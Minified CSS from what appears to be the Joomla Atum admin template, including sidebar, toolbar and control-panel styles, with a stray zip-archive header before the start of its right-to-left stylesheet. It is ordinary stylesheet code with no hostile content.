.quickicon-amount{padding:.25rem .5rem;font-weight:700;line-height:1rem;background:hsl(var(--hue),50%,93%);border-radius:.25rem;transition:all .25s ease;-webkit-margin-start:.5rem;margin-inline-start:.5rem}.quick-icons .quickicon a .j-links-link{display:block;padding:0 .2rem;line-height:1.1}.quick-icons .quickicon a:active,.quick-icons .quickicon a:focus,.quick-icons .quickicon a:hover{color:#fff;text-decoration:none;background:var(--bg-color-hvr)}.quick-icons .quickicon a:active .quickicon-amount,.quick-icons .quickicon a:focus .quickicon-amount,.quick-icons .quickicon a:hover .quickicon-amount{background:var(--icon-color)}.quick-icons .quickicon a.danger,.quick-icons .quickicon a.warning{--text-color:var(--danger);--bg-color:#f4f0f0;--icon-color:#ce8484;--bg-color-hvr:var(--danger)}.quick-icons .quickicon a.success{--text-color:var(--success);--bg-color:#f3f9f3;--icon-color:#55a258;--bg-color-hvr:var(--success)}.quick-icons .quickicon-info{display:flex;align-items:flex-end}.quick-icons .quickicon-linkadd{width:2.5rem;font-size:1.2rem;background:hsl(var(--hue),50%,93%);transition:all .25s ease}.quick-icons .quickicon-linkadd a{align-items:flex-end;justify-content:center;width:100%}.quick-icons .quickicon-linkadd a>*{margin-bottom:10px;color:hsl(var(--hue),30%,40%)}.quick-icons .quickicon-linkadd a:active,.quick-icons .quickicon-linkadd a:focus,.quick-icons .quickicon-linkadd a:hover{background:var(--template-bg-dark)}.quick-icons .quickicon-linkadd a:active *,.quick-icons .quickicon-linkadd a:focus *,.quick-icons .quickicon-linkadd a:hover *{color:#fff}.quick-icons .quickicon-group,.quick-icons .quickicon-single{display:flex;min-height:6rem;overflow:hidden;border:1px solid hsl(var(--hue),50%,93%);border-radius:4px}#content .menu-quicktask{position:absolute}[dir=ltr] #content .menu-quicktask{right:1.25rem}[dir=rtl] #content .menu-quicktask{left:1.25rem}#content form .name.break-word{word-break:break-word}.sidebar-wrapper{z-index:1010;min-height:calc(100vh - 66px);overflow:hidden;background-color:var(--template-sidebar-bg);box-shadow:0 0 20px -10px var(--template-bg-dark-50)}.sidebar-wrapper .sidebar-sticky{position:sticky;top:0}.sidebar-wrapper .item{position:relative;display:flex;flex-wrap:wrap;list-style-type:none}.sidebar-wrapper .item .menu-dashboard,.sidebar-wrapper .item .menu-quicktask,.sidebar-wrapper .item a{color:#fff;text-decoration:none}.sidebar-wrapper .item .menu-dashboard:hover,.sidebar-wrapper .item .menu-quicktask:hover,.sidebar-wrapper .item a:hover{color:var(--template-text-light);text-decoration:none;background-color:var(--template-bg-dark-65)}.sidebar-wrapper .item>a{position:relative;display:flex;flex-grow:1;align-items:center;min-height:40px}.sidebar-wrapper .item>a [class*=" fa-"],.sidebar-wrapper .item>a [class*=" icon-"],.sidebar-wrapper .item>a [class^=fa-],.sidebar-wrapper .item>a [class^=icon-]{margin:0 .85rem;-webkit-transform:scale(1.2);transform:scale(1.2)}.sidebar-wrapper .item-level-2>a{-webkit-padding-start:3rem;padding-inline-start:3rem}.sidebar-wrapper .item-level-3>a{-webkit-padding-start:3.75rem;padding-inline-start:3.75rem}@media (min-width:576px){.sidebar-wrapper{flex:1 0 18rem;max-width:18rem;transition:all .3s ease-in-out}}@media (max-width:575.98px){.sidebar-wrapper.sidebar-menu{top:auto}}.sidebar-wrapper .sidebar-toggle{background:var(--template-bg-dark-60)}.sidebar-wrapper .sidebar-toggle a{color:#fff}.sidebar-wrapper .sidebar-toggle .sidebar-item-title{white-space:nowrap}.main-nav{width:18rem;padding:0;font-size:.95rem}@media (max-width:575.98px){.main-nav{width:100%}}.main-nav li .menu-dashboard>a,.main-nav li .menu-quicktask>a{display:inline-flex;align-items:center;justify-content:center;width:40px;height:100%}.main-nav ul{width:100%;padding:0;background-color:var(--template-bg-dark-75)}.main-nav .divider{height:1px;margin:0 0 0 48px;list-style:none;background-color:var(--template-bg-dark-60)}.main-nav .menuitem-group{margin-top:.65rem;font-size:.75rem;-webkit-padding-start:3rem;padding-inline-start:3rem}.main-nav .menuitem-group .sidebar-item-title{color:var(--template-bg-dark-30)}.main-nav .has-arrow .sidebar-item-title{-webkit-margin-end:auto;margin-inline-end:auto}.main-nav .has-arrow:after{display:flex;align-items:center;justify-content:center;width:2rem;font-family:Font Awesome\ 5 Free;font-weight:900}[dir=ltr] .main-nav .has-arrow:after{content:""}[dir=rtl] .main-nav .has-arrow:after{content:""}.main-nav a.mm-active{background-color:var(--template-bg-dark-70)}.main-nav a.mm-active+.menu-quicktask{background-color:var(--template-bg-dark-60)}.main-nav .mm-active>.has-arrow:after{content:""}.main-nav .mm-collapse{display:none}.main-nav .mm-collapse.mm-collapsed,.main-nav .mm-collapse.mm-show{display:block}.main-nav .mm-collapsing{position:relative;height:0;overflow:hidden;transition:all .35s ease}.main-nav .badge{align-self:center;margin:0 .3rem .25rem;background-color:var(--template-bg-dark-60)}.closed .sidebar-wrapper{flex:1 0 3rem;max-width:3rem;overflow:visible}.closed .has-arrow:after,.closed .menu-dashboard,.closed .sidebar-item-title{display:none}.closed .main-nav,.closed .main-nav li{max-width:3rem}.closed .main-nav a:hover{position:relative;max-width:3rem}.closed .main-nav a:hover .sidebar-item-title{position:absolute;left:100%;display:flex;align-items:center;height:100%;padding:0 1rem;white-space:nowrap;pointer-events:none;background-color:var(--template-bg-dark-60);border-radius:0 .25rem .25rem 0}[dir=rtl] .closed .main-nav a:hover .sidebar-item-title{right:100%;left:unset;border-radius:.25rem 0 0 .25rem}.closed .main-nav>li>ul{height:0;padding:0;visibility:hidden}@media (min-width:576px){.toggler-burger{display:none}}@media (max-width:575.98px){#menu-collapse{display:none;background:var(--template-bg-dark-50)}.toggler-burger{position:fixed;right:0;bottom:0;z-index:9999;padding:10px 15px}[dir=rtl] .toggler-burger{right:auto;left:0}.toggler-burger:focus{box-shadow:none}.toggler-burger .navbar-toggler-icon:before{display:inline-block;font:normal normal 900 28px/1 Font Awesome\ 5 Free;color:var(--toggle-color);content:""}.toggler-burger.collapsed .navbar-toggler-icon:before{content:""}.sidebar-menu{display:none}.sidebar-menu.collapsing,.sidebar-menu.show{position:fixed;bottom:55px;z-index:9000;display:block;width:100%;min-height:auto;max-height:calc(100vh - 72px);overflow-y:auto}}.sidebar-nav{padding:1rem 2rem}.sidebar-nav li{font-size:.9rem;font-weight:700}.sidebar-nav li.divider{margin:.3rem 0}.sidebar-nav li a{display:block;padding:.25rem;font-weight:400;color:var(--template-text-dark);text-decoration:none}.sidebar-nav li a:before{margin-right:.5rem;font-family:Font Awesome\ 5 Free;font-weight:900;content:""}[dir=rtl] .sidebar-nav li a:before{margin-right:0;content:none}[dir=rtl] .sidebar-nav li a:after{-webkit-margin-end:.5rem;margin-inline-end:.5rem;font-family:Font Awesome\ 5 Free;font-weight:900;content:""}.sidebar-nav li.active,.sidebar-nav li.item:hover{background-color:var(--template-bg-dark-60)}.sidebar-nav li.active a,.sidebar-nav li.item:hover a{color:var(--template-text-light)}.switcher .toggle-outside{border:1px solid var(--template-bg-dark-20);border-radius:.25rem}.switcher .toggle-outside:focus{box-shadow:inset 0 0 0 .1rem #e9e9e9}.switcher input:focus~.toggle-outside{border-color:#39f;box-shadow:0 0 0 .2rem #eaeaea}.disabled{opacity:.4}.subhead{position:sticky;top:0;right:0;left:0;z-index:1000;width:auto;min-height:43px;padding:8px 1rem;color:var(--template-text-dark);background:#fff;background-image:linear-gradient(var(--toolbar-bg),var(--template-bg-dark-3));box-shadow:0 2px 10px -8px var(--template-bg-dark-50)}.subhead .row{margin-right:0;margin-left:0}.subhead.noshadow{box-shadow:none}.subhead .btn-group,.subhead joomla-toolbar-button{-webkit-margin-start:.75rem;margin-inline-start:.75rem}.subhead .btn-group:first-child,.subhead joomla-toolbar-button:first-child{-webkit-margin-start:0;margin-inline-start:0}.subhead joomla-toolbar-button .btn>span,.subhead joomla-toolbar-button .dropdown-item>span{-webkit-margin-end:.5rem;margin-inline-end:.5rem;width:1.25em;text-align:center}.subhead .btn{--subhead-btn-accent:var(--template-text-dark);padding:0 1rem;margin:5px 0;font-size:1rem;line-height:2.45rem;color:var(--template-text-dark);background:#fff;border-color:hsl(var(--hue),20%,80%)}.subhead .btn>span{display:inline-block;color:var(--subhead-btn-accent)}.subhead .btn:not([disabled]):active,.subhead .btn:not([disabled]):focus,.subhead .btn:not([disabled]):hover{color:hsla(0,0%,100%,.9);background-color:var(--subhead-btn-accent);border-color:var(--subhead-btn-accent)}.subhead .btn:not([disabled]):active>span,.subhead .btn:not([disabled]):focus>span,.subhead .btn:not([disabled]):hover>span{color:hsla(0,0%,100%,.9)}.subhead .btn.btn-success{--subhead-btn-accent:var(--success)}.subhead .btn.btn-danger{--subhead-btn-accent:var(--danger)}.subhead .btn.btn-primary{--subhead-btn-accent:var(--template-link-color)}.subhead .btn.btn-secondary{--subhead-btn-accent:var(--template-special-color)}.subhead .btn.btn-action,.subhead .btn.btn-info{--subhead-btn-accent:var(--template-bg-dark)}.subhead .btn.btn-action{display:flex;align-items:center}.subhead .btn.btn-action:after{width:2.375rem;font-family:Font Awesome\ 5 Free;font-weight:900;content:"";border:0}.subhead .btn.dropdown-toggle[disabled],.subhead .btn[disabled]{--subhead-btn-accent:var(--template-bg-dark);background:rgba(222,226,230,.8);opacity:.5}.subhead .btn.dropdown-toggle[disabled]:active,.subhead .btn.dropdown-toggle[disabled]:focus,.subhead .btn.dropdown-toggle[disabled]:hover,.subhead .btn[disabled]:active,.subhead .btn[disabled]:focus,.subhead .btn[disabled]:hover{cursor:not-allowed}.subhead .dropdown-toggle.btn{-webkit-padding-end:0;padding-inline-end:0}.subhead .btn-group:not(:last-child)>.dropdown-toggle-split{order:1;-webkit-margin-start:-.25rem;margin-inline-start:-.25rem}[dir=ltr] .subhead .btn-group:not(:last-child)>.dropdown-toggle-split{border-radius:0 .25rem .25rem 0}[dir=rtl] .subhead .btn-group:not(:last-child)>.dropdown-toggle-split{border-radius:.25rem 0 0 .25rem}.subhead .btn-group joomla-toolbar-button,.subhead .dropdown-menu joomla-toolbar-button{-webkit-margin-start:0;margin-inline-start:0}.contentpane .subhead{margin:-15px -15px 0;background-image:none;border-bottom:1px solid var(--template-bg-dark-7)}@media (max-width:575.98px){joomla-tab[view=accordion] .col-md-3,joomla-tab[view=accordion] .col-md-9{padding:.5rem 1rem!important}#myTab{margin-top:1rem;margin-bottom:1.5rem}joomla-tab[view=accordion] ul li{width:100%}.toggler-toolbar{top:0;bottom:auto;z-index:1030;padding:7px 10px;margin:5px;background-color:var(--template-bg-dark);border-radius:30px}.toggler-toolbar .toggler-toolbar-icon:before{font:normal normal 900 28px/1 Font Awesome\ 5 Free;color:var(--toggle-color);content:""}.toggler-toolbar.collapsed .toggler-toolbar-icon:before{content:""}.subhead{padding-right:0;padding-left:0}.subhead .btn,.subhead .btn-group,.subhead joomla-toolbar-button{width:100%;margin-left:0;text-align:left}.subhead .btn-toolbar>.btn-group,.subhead .btn-toolbar>joomla-toolbar-button{margin-left:0}.subhead .btn.btn-action:after{text-align:center;-webkit-margin-start:auto;margin-inline-start:auto}.subhead .dropdown-toggle-split{width:auto}}.treeselect{display:block;padding-left:0;list-style:none}.treeselect .nav-header{font-weight:700;color:#212529}.treeselect li{position:relative;display:block;line-height:2.2rem;list-style:none}.treeselect li:before{position:absolute;top:14px;left:25px;width:10px;height:1px;margin:auto;content:"";background-color:rgba(0,0,0,.2)}[dir=rtl] .treeselect li:before{right:25px;left:0;margin:0}.treeselect li:after{position:absolute;top:0;bottom:0;left:25px;width:1px;height:100%;content:"";background-color:rgba(0,0,0,.2)}[dir=rtl] .treeselect li:after{right:25px;left:0}.treeselect li:last-child:after{height:14px}.treeselect li li{-webkit-padding-start:40px;padding-inline-start:40px}.treeselect .fa-,.treeselect .icon-,.treeselect>li:after,.treeselect>li:before{display:none}.treeselect .treeselect-toggle{display:inline-block;padding:0;margin-right:.1rem;text-align:center;cursor:pointer}.treeselect .treeselect-item,.treeselect .treeselect-menu{display:inline-block}.treeselect .treeselect-item input{position:relative;top:1px;margin-right:.2rem}.treeselect .treeselect-item label{margin-bottom:0}.treeselect .dropdown-toggle{padding:0 .5rem .3rem;margin-left:.5rem}.treeselect .dropdown-toggle:after{margin-left:0;font-size:1rem;color:var(--template-text-dark)}.treeselect-sub{padding-left:0}.tree-holder ul ul li:after,.tree-holder ul ul li:before{left:8px;display:block}[dir=rtl] .tree-holder ul ul li:after,[dir=rtl] .tree-holder ul ul li:before{right:8px;left:0;margin:0}.tree-holder ul ul li:before{top:12px}.tree-holder ul ul li:last-child:after{height:12px}.tree-holder li{line-height:1.8rem}.tree-holder li li{-webkit-padding-start:20px;padding-inline-start:20px}*{box-sizing:border-box}.element-invisible{position:absolute;width:1px;height:1px;padding:0;overflow:hidden;clip:rect(0,0,0,0);white-space:nowrap;border:0;-webkit-clip-path:inset(50%);clip-path:inset(50%)}.hidden{display:none}.table-row{display:table-row}.form-grid{--span-1:span 1;--span-2:span 1;--span-3:span 1;--span-4:span 1;--span-5:span 1;display:grid;grid-template-columns:repeat(1,1fr);grid-gap:1rem}@media (min-width:576px){.form-grid{--span-2:span 2;--span-3:span 2;--span-4:span 2;--span-5:span 2;grid-template-columns:repeat(2,1fr)}}@media (min-width:768px){.form-grid{--span-3:span 3;--span-4:span 4;--span-5:span 4;grid-template-columns:repeat(4,1fr);grid-gap:1rem 2rem}}@media (min-width:992px){.form-grid{--span-5:span 5;grid-template-columns:repeat(6,1fr)}}.form-grid>*{grid-column:1/-1}.form-grid .stack{flex-direction:column}.form-grid .span-1{grid-column:1/var(--span-1)}.form-grid .span-1-inline{grid-column:var(--span-1)}.form-grid .span-2{grid-column:1/var(--span-2)}.form-grid .span-2-inline{grid-column:var(--span-2)}.form-grid .span-3{grid-column:1/var(--span-3)}.form-grid .span-3-inline{grid-column:var(--span-3)}.form-grid .span-4{grid-column:1/var(--span-4)}.form-grid .span-4-inline{grid-column:var(--span-4)}.form-grid .span-5{grid-column:1/var(--span-5)}.form-grid .span-5-inline{grid-column:var(--span-5)}@media (min-width:992px){.form-grid .offset-1{grid-column-start:2}.form-grid .offset-2{grid-column-start:3}.form-grid .offset-3{grid-column-start:4}.form-grid .offset-4{grid-column-start:5}.form-grid .offset-5{grid-column-start:6}}.w-1{width:1%}.w-3{width:3%}.w-5{width:5%}.w-6{width:6%}.w-7{width:7%}.w-10{width:10%}.w-12{width:12%}.w-15{width:15%}.w-20{width:20%}.w-30{width:30%}.w-35{width:35%}.w-40{width:40%}.w-60{width:60%}.w-80{width:80%}.editor-xtd-buttons .btn{margin-bottom:5px}.CodeMirror-fullscreen{top:63px}.gu-mirror{position:fixed!important;z-index:1060!important;display:table;margin:0!important;cursor:move;opacity:.8}.gu-mirror,.gu-mirror td,.gu-mirror th{background-color:#20c997}.js-draggable .sortable-handler{cursor:move}.editor .toggle-editor{margin-top:1rem}.editor .mce-tinymce{border:1px solid var(--template-bg-dark)}.editor .mce-btn,.editor .mce-panel{background:var(--white-offset)}.container-main .mce-panel{background:transparent;border:0;box-shadow:none}.container-main .mce-top-part{margin-bottom:1rem}.container-main .mce-top-part:before{box-shadow:none}.container-main .mce-menubar .mce-menubtn{background-color:#fff}.container-main .mce-flow-layout-item{margin:2px 8px 2px 0}.container-main .mce-btn-group:not(:first-child){margin-right:6px;margin-left:0}.container-main .mce-btn-group .mce-btn{margin:0 1px 0 0}.container-main .mce-statusbar .mce-container-body{background-color:#fff;border-top:1px solid var(--template-bg-light)}.com_config #fieldset-permissions{grid-template-columns:1fr}.com_config #page-filters .custom-select,.com_config #page-filters .form-select{width:auto}.com_config .tab-description{grid-column:1/-1}.com_config .options-menu .revert-controls .controls{-webkit-margin-start:0;margin-inline-start:0}.com_content.layout-edit joomla-field-media .field-media-preview{height:10.25rem}.com_content.layout-edit joomla-tab #attrib-basic[active],.com_content.layout-edit joomla-tab #editor[active]{display:flex;flex-wrap:wrap}.com_content.layout-edit joomla-tab #attrib-basic[active] .form-group,.com_content.layout-edit joomla-tab #editor[active] .form-group{flex:0 0 50%;max-width:50%;box-shadow:none}.com_content.layout-edit joomla-tab #attrib-basic[active] .field-spacer,.com_content.layout-edit joomla-tab #attrib-basic[active] .form-group:first-child,.com_content.layout-edit joomla-tab #attrib-basic[active] .form-group:nth-child(19),.com_content.layout-edit joomla-tab #editor[active] .field-spacer,.com_content.layout-edit joomla-tab #editor[active] .form-group:first-child,.com_content.layout-edit joomla-tab #editor[active] .form-group:nth-child(19){flex:0 0 100%;max-width:100%}.com-cpanel-help .list-group-item,.com-cpanel-system .list-group-item,.cpanel-add-module-icon-help .list-group-item,.cpanel-add-module-icon-system .list-group-item{padding:0}.com-cpanel-help .list-group-item a,.com-cpanel-system .list-group-item a,.cpanel-add-module-icon-help .list-group-item a,.cpanel-add-module-icon-system .list-group-item a{display:block;padding:.75rem 1rem}.com-cpanel-help__header,.cpanel-add-module-icon-help__header{color:var(--template-special-color)}.com-cpanel-help a,.cpanel-add-module-icon-help a{color:var(--template-link-color)}.com-cpanel-help .h2,.com-cpanel-help h2,.cpanel-add-module-icon-help .h2,.cpanel-add-module-icon-help h2{font-size:1rem}.com-cpanel-system,.cpanel-add-module-icon-system{-webkit-column-count:4;-moz-column-count:4;column-count:4}.com-cpanel-system__category,.cpanel-add-module-icon-system__category{margin-bottom:1.5em;page-break-inside:avoid;-webkit-column-break-inside:avoid;-moz-column-break-inside:avoid;break-inside:avoid}.com-cpanel-system__header,.cpanel-add-module-icon-system__header{color:var(--template-special-color)}.com-cpanel-system__header span,.cpanel-add-module-icon-system__header span{margin-right:5px}.com-cpanel-system a,.cpanel-add-module-icon-system a{color:var(--template-link-color)}.com-cpanel-system .h2,.com-cpanel-system h2,.cpanel-add-module-icon-system .h2,.cpanel-add-module-icon-system h2{font-size:1rem}@media (max-width:991.98px){.com-cpanel-system,.cpanel-add-module-icon-system{-webkit-column-count:2;-moz-column-count:2;column-count:2}}@media (max-width:767.98px){.com-cpanel-system,.cpanel-add-module-icon-system{-webkit-column-count:1;-moz-column-count:1;column-count:1}}.com_cpanel .content{margin-top:2rem}.com_cpanel .card p:last-child{margin-bottom:0}.com_cpanel .card .list-group,.com_cpanel .card .table{padding:0;margin-bottom:unset}.com_cpanel .card-header{display:flex;align-items:center;padding:1rem 1rem .75rem;font-weight:700;color:var(--template-bg-dark);background:var(--card-bg)}.com_cpanel .card-header>[class^=icon-],.com_cpanel .card-header>img{-webkit-margin-end:.5rem;margin-inline-end:.5rem}.com_cpanel .card-header .btn{margin-top:.25em;margin-bottom:.25em}.com_cpanel .card-body{padding:0;overflow:hidden;border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.com_cpanel .module-actions{order:1;-webkit-margin-start:auto;margin-inline-start:auto}.com_cpanel .module-actions>*{padding:0;color:var(--template-bg-dark-70)}.com_cpanel .cpanel-add-module{display:flex;flex-direction:column;align-items:flex-start;justify-content:flex-end;width:100%;min-height:130px;padding:0 1rem;font-size:.875rem;font-weight:700;line-height:1;color:hsl(var(--hue),30%,40%);background-color:hsl(var(--hue),35%,98%);border:1px solid hsl(var(--hue),35%,88%);border-radius:.25rem;transition:all .15s ease-in}.com_cpanel .cpanel-add-module:active,.com_cpanel .cpanel-add-module:focus,.com_cpanel .cpanel-add-module:hover{color:#fff;text-decoration:none;background:var(--template-bg-dark)}.com_cpanel .cpanel-add-module>span{padding:.25rem 0 1rem}.com_cpanel .cpanel-add-module .cpanel-add-module-icon{font-size:2rem;color:hsl(var(--hue),30%,40%);-webkit-margin-end:.5rem;margin-inline-end:.5rem}.cpanel-modules .list-group{border-top:1px solid hsl(var(--hue),40%,85%)}.cpanel-modules .list-group-item:hover{background:var(--toolbar-bg)}.cpanel-modules .list-group-item a{font-weight:500;text-decoration:underline}.cpanel-modules .list-group-item .btn{text-decoration:none}.cpanel-modules .list-group-item .list-group-item a>span[class*=" fa-"],.cpanel-modules .list-group-item .list-group-item a>span[class*=" icon-"],.cpanel-modules .list-group-item .list-group-item a>span[class^=fa-],.cpanel-modules .list-group-item .list-group-item a>span[class^=icon-]{display:block;padding:.5rem;color:hsla(0,0%,100%,.9);background:var(--template-link-color);box-shadow:0 2px 10px -8px var(--template-bg-dark-50)}.cpanel-modules .list-group-item .list-group-item a>span[class*=" fa-"]:hover,.cpanel-modules .list-group-item .list-group-item a>span[class*=" icon-"]:hover,.cpanel-modules .list-group-item .list-group-item a>span[class^=fa-]:hover,.cpanel-modules .list-group-item .list-group-item a>span[class^=icon-]:hover{background:var(--template-link-hover-color)}.cpanel-modules .list-group-item span.home-image[class*=" fa-"],.cpanel-modules .list-group-item span.home-image[class*=" icon-"],.cpanel-modules .list-group-item span.home-image[class^=fa-],.cpanel-modules .list-group-item span.home-image[class^=icon-]{display:inline-block;padding:0;margin:0 .85rem;font-size:.9rem;color:#010101;background:var(--white-offset);box-shadow:none;-webkit-transform:scale(1.2);transform:scale(1.2)}.cpanel-modules .h2,.cpanel-modules h2{margin-bottom:0;font-size:1rem}.cpanel-modules .mod-custom,.sample-data .list-group-item{padding:1rem}.sample-data__title{font-weight:700;color:var(--primary)}.sample-data__icon{width:1.3rem;text-align:center}.sample-data__desc{-webkit-border-start:4px solid hsl(var(--hue),50%,93%);border-inline-start:4px solid hsl(var(--hue),50%,93%);-webkit-padding-start:1rem;padding-inline-start:1rem;-webkit-margin-start:8px;margin-inline-start:8px}.com_joomlaupdate caption{caption-side:top}.new-modules .card-columns{grid-template-columns:repeat(auto-fill,minmax(240px,1fr))}.new-module{display:flex;overflow:hidden;color:hsl(var(--hue),30%,40%);background-color:hsl(var(--hue),60%,97%);border:1px solid hsl(var(--hue),50%,93%);border-radius:.25rem}.new-module *{transition:all .25s ease}.new-module-details{flex:1 0;padding:1rem}.new-module-title{margin-bottom:.25rem;font-size:1rem;font-weight:700}.new-module-caption{display:box;margin:0;overflow:hidden;font-size:.875rem;box-orient:vertical;-webkit-line-clamp:3}.new-module-link{display:flex;align-items:flex-end;justify-content:center;width:2.5rem;font-size:1.2rem;background:hsl(var(--hue),50%,93%)}.new-module-link span{margin-bottom:10px;color:hsl(var(--hue),30%,40%)}.new-module:hover .new-module-link{background:var(--template-bg-dark)}.new-module:hover .new-module-link span{color:#fff}.com_tags #fieldset-image-fulltext>div,.com_tags #fieldset-image-intro>div{grid-template-columns:1fr}@media (min-width:768px){.com_tags #fieldset-image-fulltext,.com_tags #fieldset-image-intro{display:inline-block;width:calc(50% - 15px)}}.com_tags #fieldset-image-intro{-webkit-margin-end:15px;margin-inline-end:15px}.com_tags #fieldset-image-fulltext{-webkit-margin-start:15px;margin-inline-start:15px}.tbody-icon .fa-download,.tbody-icon .icon-download{color:var(--success);border-color:var(--success)}.tbody-icon .fa-mail,.tbody-icon .icon-mail{color:var(--primary);border-color:var(--primary)}.tbody-icon .fa-delete,.tbody-icon .fa-times,.tbody-icon .icon-delete,.tbody-icon .icon-times{color:var(--danger);border-color:var(--danger)}.com_templates .menu-assignment{position:relative}.com_templates .menu-assignment .menu-links{padding-left:0;margin-top:15px;margin-left:0;-webkit-column-count:3;-moz-column-count:3;column-count:3;-webkit-column-gap:15px;-moz-column-gap:15px;column-gap:15px}@media (max-width:991.98px){.com_templates .menu-assignment .menu-links{-webkit-column-count:auto;-moz-column-count:auto;column-count:auto}}.com_templates .menu-assignment .menu-links>li{display:inline-block;width:100%;margin-bottom:15px;vertical-align:top;list-style:none;-webkit-backface-visibility:hidden;backface-visibility:hidden;page-break-inside:avoid;-webkit-column-break-inside:avoid;-moz-column-break-inside:avoid;break-inside:avoid}.com_templates .menu-assignment .menu-links-block{padding:15px;background-color:var(--card-bg);border:1px solid #dee2e6;border-radius:3px}.com_templates .menu-assignment label{display:block;padding:3px 0;font-size:inherit}.com_templates .menu-assignment label input{position:relative;-webkit-margin-end:5px;margin-inline-end:5px}.com_users.view-debuggroup thead th,.com_users.view-debuguser thead th{white-space:normal}.com_users.view-debuggroup .legend,.com_users.view-debuguser .legend{margin:1rem 1rem 0}.com_users.view-mail .form-control{max-width:100%}.com_users #fieldset-groups .controls{-webkit-margin-start:2rem;margin-inline-start:2rem}@media (prefers-reduced-motion:reduce){*,:after,:before{background-attachment:scroll!important;transition-delay:0s!important;transition-duration:.001ms!important;-webkit-animation-duration:1ms!important;animation-duration:1ms!important;-webkit-animation-delay:-1ms!important;animation-delay:-1ms!important;-webkit-animation-iteration-count:1!important;animation-iteration-count:1!important;scroll-behavior:auto!important}}PK!�u�����atum/css/template-rtl.min.cssnu&1i�@charset "UTF-8";:root{--card-bg:hsla(0,0%,100%,0.7);--bluegray:#b2bfcd;--lightbluegray:#f6f9fc;--toolbar-bg:#fff;--success-border:var(--success);--info-border:var(--info);--warning-border:var(--warning);--danger-border:var(--danger);--login-main-bg:#0b1c32;--border:#cdcdcd;--white:#fff;--white-offset:#fefefe;--focus:#39f;--focus-shadow:0 0 0 0.2rem #eaeaea;--toggle-color:#fff;--template-sidebar-bg:var(--template-bg-dark-80);--template-sidebar-font-color:#fff;--template-sidebar-link-color:#fff;--template-bg-light:#f0f4fb;--template-text-light:#fff;--template-special-color:#001b4c;--template-link-color:#2a69b8;--template-link-hover-color:#173a65;--template-contrast:#2a69b8;--template-bg-dark:hsl(var(--hue),40%,20%);--template-bg-dark-3:hsl(var(--hue),40%,97%);--template-bg-dark-5:hsl(var(--hue),40%,95%);--template-bg-dark-7:hsl(var(--hue),40%,93%);--template-bg-dark-10:hsl(var(--hue),40%,90%);--template-bg-dark-15:hsl(var(--hue),40%,85%);--template-bg-dark-20:hsl(var(--hue),40%,80%);--template-bg-dark-30:hsl(var(--hue),40%,70%);--template-bg-dark-40:hsl(var(--hue),40%,60%);--template-bg-dark-50:hsl(var(--hue),40%,50%);--template-bg-dark-60:hsl(var(--hue),40%,40%);--template-bg-dark-65:hsl(var(--hue),40%,35%);--template-bg-dark-70:hsl(var(--hue),40%,30%);--template-bg-dark-75:hsl(var(--hue),40%,25%);--template-bg-dark-80:hsl(var(--hue),40%,20%);--template-bg-dark-90:hsl(var(--hue),40%,10%);--primary:#132f53;--secondary:#495057;--success:#457d54;--info:#2a69b8;--warning:#ffb514;--danger:#c52827;--light:#f8f9fa;--dark:#212529;--atum-link-color:#2a69b8;--atum-text-dark:#495057;--action:#132f53;--error:#3b0d0c;--alert-success:#0f2f21;--font-sans-serif:"Roboto",-apple-system,BlinkMacSystemFont,"Segoe UI","Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--gradient:linear-gradient(180deg,hsla(0,0%,100%,0.15),hsla(0,0%,100%,0))}*,:after,:before{box-sizing:border-box}@media (prefers-reduced-motion:no-preference){:root{scroll-behavior:smooth}}body{font-family:var(--font-sans-serif);font-size:1rem;font-weight:400;line-height:1.5;color:var(--template-text-dark);background-color:#fff;-webkit-text-size-adjust:100%;-webkit-tap-highlight-color:rgba(0,0,0,0)}hr{margin:1rem 0;color:inherit;background-color:currentColor;border:0;opacity:.25}hr:not([size]){height:1px}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:.5rem;font-weight:500;line-height:1.2;color:var(--template-bg-dark)}.h1,h1{font-size:calc(1.29rem + .48vw)}@media (min-width:1200px){.h1,h1{font-size:1.65rem}}.h2,h2{font-size:calc(1.275rem + .3vw)}@media (min-width:1200px){.h2,h2{font-size:1.5rem}}.h3,h3{font-size:1.25rem}.h4,h4{font-size:1rem}.h5,h5{font-size:.9286rem}.h6,h6{font-size:.8571rem}p{margin-top:0;margin-bottom:1rem}abbr[data-bs-original-title],abbr[title]{-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height:inherit}ol,ul{padding-left:2rem}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}b,strong{font-weight:bolder}.small,small{font-size:.875em}.mark,mark{padding:.2em;background-color:#fcf8e3}sub,sup{position:relative;font-size:.75em;line-height:0;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}a{color:var(--template-link-color);text-decoration:none}a:hover{color:var(--template-link-hover-color)}a:not([href]):not([class]),a:not([href]):not([class]):hover{color:inherit;text-decoration:none}code,kbd,pre,samp{font-family:var(--font-monospace);font-size:1em;direction:ltr;unicode-bidi:bidi-override}pre{display:block;margin-top:0;margin-bottom:1rem;overflow:auto;font-size:.875em}pre code{font-size:inherit;color:inherit;word-break:normal}code{font-size:.875em;color:#971250;word-wrap:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:.875em;color:#fff;background-color:#212529;border-radius:.2rem}kbd kbd{padding:0;font-size:1em;font-weight:700}figure{margin:0 0 1rem}img,svg{vertical-align:middle}table{caption-side:bottom;border-collapse:collapse}caption{padding-top:.75rem;padding-bottom:.75rem;color:#666e76;text-align:left}tbody,td,tfoot,th,thead,tr{border:0 